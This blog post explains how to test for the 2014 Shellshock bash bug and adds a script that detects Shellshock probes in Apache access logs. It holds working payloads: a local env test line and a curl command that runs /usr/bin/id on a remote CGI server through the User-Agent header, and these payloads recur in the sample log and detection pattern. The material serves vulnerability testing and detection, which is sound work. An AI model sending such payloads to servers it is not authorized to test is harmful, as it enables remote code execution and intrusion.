Saturday, September 27, 2014

ShellShock Testing

Patch your /usr/bin/bash NOW. The 'Shellshock' bug blasts OS X and Linux systems wide open. The attack vectors range from CGI scripts to DHCP clients (and maybe more), and lead to remote code execution.

Proof of Concept - at local system
A simple test to check if your Bash is vulnerable is available publicly.
$ env var='() { :;}; echo vulnerable' bash -c /bin/true  
Upon running the above command, an affected version of bash will output "vulnerable". Once the patch has been applied, the same test will return the following result.
bash: warning: var: ignoring function definition attempt
bash: error importing function definition for 'var'

Proof of Concept - to a remote server.
curl -A "() { ignored; }; echo Content-Type: text/plain ; echo  ; echo ; /usr/bin/id" http://<your-server>/cgi-bin/<your-script>
A vulnerable web CGI will return uid=48(apache) gid=48(apache) groups=48(apache), followed by the HTML page. A non-vulnerable server should return just the HTML page.
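
The remote test above carries the trigger in the User-Agent header, so requests like it show up in web server access logs. The following is an added example, not part of the original post: it flags log entries whose Referer or User-Agent begins with the "() {" prefix that a vulnerable bash treats as a function definition. It assumes the Apache "combined" log format; the function names and sample log lines are constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example: find Shellshock-style probes in an Apache "combined" access log.

# Constructed sample lines (documentation IP ranges, not real traffic).
sample_log() {
cat <<'EOF'
192.0.2.10 - - [27/Sep/2014:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.0.2.77 - - [27/Sep/2014:10:01:09 +0000] "GET /cgi-bin/status HTTP/1.1" 200 98 "-" "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id"
198.51.100.4 - - [27/Sep/2014:10:02:30 +0000] "GET /cgi-bin/status HTTP/1.1" 200 98 "() { :;}; echo vulnerable" "curl/7.35.0"
203.0.113.5 - - [27/Sep/2014:10:03:00 +0000] "GET /js/app.js?cb=function(){} HTTP/1.1" 200 77 "-" "Mozilla/5.0"
EOF
}

# Reads combined-format log lines on stdin and prints one line per hit:
#   client_ip <TAB> request line <TAB> header that carried the trigger
find_shellshock() {
  awk -F'"' '
    {
      # Splitting on double quotes: $2 = request, $4 = Referer, $6 = User-Agent.
      for (i = 4; i <= 6; i += 2) {
        # The header value must start with the literal prefix "() {".
        if ($i ~ /^\(\) [{]/) {
          split($1, head, " ")          # head[1] is the client address
          printf "%s\t%s\t%s\n", head[1], $2, (i == 4 ? "referer" : "user-agent")
          break                          # report each request once
        }
      }
    }'
}

# Stand-alone demo on the constructed sample.
sample_log | find_shellshock
```

To scan a real log, pipe it in instead, e.g. `find_shellshock < access_log`. Only headers that the log format records are covered, and a hit shows that a probe was sent, not that it succeeded.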